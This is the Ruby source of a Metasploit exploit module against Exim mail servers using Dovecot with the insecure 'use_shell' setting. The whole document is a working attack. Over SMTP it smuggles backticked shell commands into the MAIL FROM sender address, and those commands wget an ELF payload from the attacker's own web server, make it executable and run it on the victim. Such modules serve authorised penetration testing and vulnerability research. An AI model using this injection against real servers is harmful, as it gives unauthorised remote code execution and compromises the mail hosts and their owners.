## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Smtp include Msf::Exploit::Remote::HttpServer include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Exim and Dovecot Insecure Configuration Command Injection', 'Description' => %q{ This module exploits a command injection vulnerability against Dovecot with Exim using the "use_shell" option. It uses the sender's address to inject arbitrary commands, since this is one of the user-controlled variables. It has been successfully tested on Debian Squeeze using the default Exim4 with the dovecot-common packages. }, 'Author' => [ 'Unknown', # From redteam-pentesting # Vulnerability Discovery and PoC 'eKKiM', # PoC 'juan vazquez' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'OSVDB', '93004' ], [ 'EDB', '25297' ], [ 'URL', 'https://www.redteam-pentesting.de/advisories/rt-sa-2013-001' ] ], 'Privileged' => false, 'Arch' => ARCH_X86, 'Platform' => 'linux', 'Payload' => { 'DisableNops' => true }, 'Targets' => [ [ 'Linux x86', { }], ], 'DisclosureDate' => 'May 03 2013', 'DefaultTarget' => 0)) register_options( [ OptString.new('EHLO', [ true, 'TO address of the e-mail', 'debian.localdomain']), OptString.new('MAILTO', [ true, 'TO address of the e-mail', 'root@debian.localdomain']), OptAddress.new('DOWNHOST', [ false, 'An alternative host to request the MIPS payload from' ]), OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]), OptPort.new('SRVPORT', [ true, 'The daemon port to listen on', 80 ]), OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 60]) ]) register_advanced_options( [ OptBool.new("SkipVersionCheck", [false, "Specify this to skip the version check", false]) ]) deregister_options('MAILFROM') end # wait for the data to be sent def wait_linux_payload print_status("#{rhost}:#{rport} - Waiting for the victim to request the ELF payload...") waited = 0 while (not @elf_sent) select(nil, nil, nil, 1) waited += 1 if (waited > datastore['HTTP_DELAY']) fail_with(Failure::Unknown, "#{rhost}:#{rport} - Target didn't request request the ELF payload -- Maybe it cant connect back to us?") end end end # Handle incoming requests from the server def on_request_uri(cli, request) if (not @pl) print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!") return end print_status("#{rhost}:#{rport} - Sending the payload to the server...") @elf_sent = true send_response(cli, @pl) end def exploit @pl = generate_payload_exe @elf_sent = false # # start our web server to deploy the final payload # downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8)) resource_uri = '/' + downfile if (datastore['DOWNHOST']) service_url_payload = datastore['DOWNHOST'] + resource_uri else # Needs to be on the port 80 if datastore['SRVPORT'].to_i != 80 fail_with(Failure::Unknown, 'The Web Server needs to live on SRVPORT=80') end #do not use SSL if datastore['SSL'] ssl_restore = true datastore['SSL'] = false end #we use SRVHOST as download IP for the coming wget command. #SRVHOST needs a real IP address of our download host if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::") srv_host = datastore['URIHOST'] || Rex::Socket.source_address(rhost) else srv_host = datastore['SRVHOST'] end service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri service_url_payload = srv_host + resource_uri print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...") start_service({'Uri' => { 'Proc' => Proc.new { |cli, req| on_request_uri(cli, req) }, 'Path' => resource_uri }}) datastore['SSL'] = true if ssl_restore end connect print_status("#{rhost}:#{rport} - Server: #{self.banner.to_s.strip}") if not datastore['SkipVersionCheck'] and self.banner.to_s !~ /Exim / disconnect fail_with(Failure::NoTarget, "#{rhost}:#{rport} - The target server is not running Exim!") end ehlo = datastore['EHLO'] ehlo_resp = raw_send_recv("EHLO #{ehlo}\r\n") ehlo_resp.each_line do |line| print_status("#{rhost}:#{rport} - EHLO: #{line.strip}") end # # Initiate the message # filename = rand_text_alpha_lower(8) from = rand_text_alpha(3) from << "`/usr/bin/wget${IFS}#{service_url_payload}${IFS}-O${IFS}/tmp/#{filename}`" from << "`chmod${IFS}+x${IFS}/tmp/#{filename}`" from << "`/tmp/#{filename}`" from << "@#{ehlo}" to = datastore['MAILTO'] resp = raw_send_recv("MAIL FROM: #{from}\r\n") resp ||= 'no response' msg = "MAIL: #{resp.strip}" if not resp or resp[0,3] != '250' fail_with(Failure::Unknown, "#{rhost}:#{rport} - #{msg}") else print_status("#{rhost}:#{rport} - #{msg}") end resp = raw_send_recv("RCPT TO: #{to}\r\n") resp ||= 'no response' msg = "RCPT: #{resp.strip}" if not resp or resp[0,3] != '250' fail_with(Failure::Unknown, "#{rhost}:#{rport} - #{msg}") else print_status("#{rhost}:#{rport} - #{msg}") end resp = raw_send_recv("DATA\r\n") resp ||= 'no response' msg = "DATA: #{resp.strip}" if not resp or resp[0,3] != '354' fail_with(Failure::Unknown, "#{rhost}:#{rport} - #{msg}") else print_status("#{rhost}:#{rport} - #{msg}") end message = "Subject: test\r\n" message << "\r\n" message << ".\r\n" resp = raw_send_recv(message) msg = "DELIVER: #{resp.strip}" if not resp or resp[0,3] != '250' fail_with(Failure::Unknown, "#{rhost}:#{rport} - #{msg}") else print_status("#{rhost}:#{rport} - #{msg}") end disconnect # wait for payload download if (datastore['DOWNHOST']) print_status("#{rhost}:#{rport} - Giving #{datastore['HTTP_DELAY']} seconds to the target to download the payload") select(nil, nil, nil, datastore['HTTP_DELAY']) else wait_linux_payload end register_file_for_cleanup("/tmp/#{filename}") end end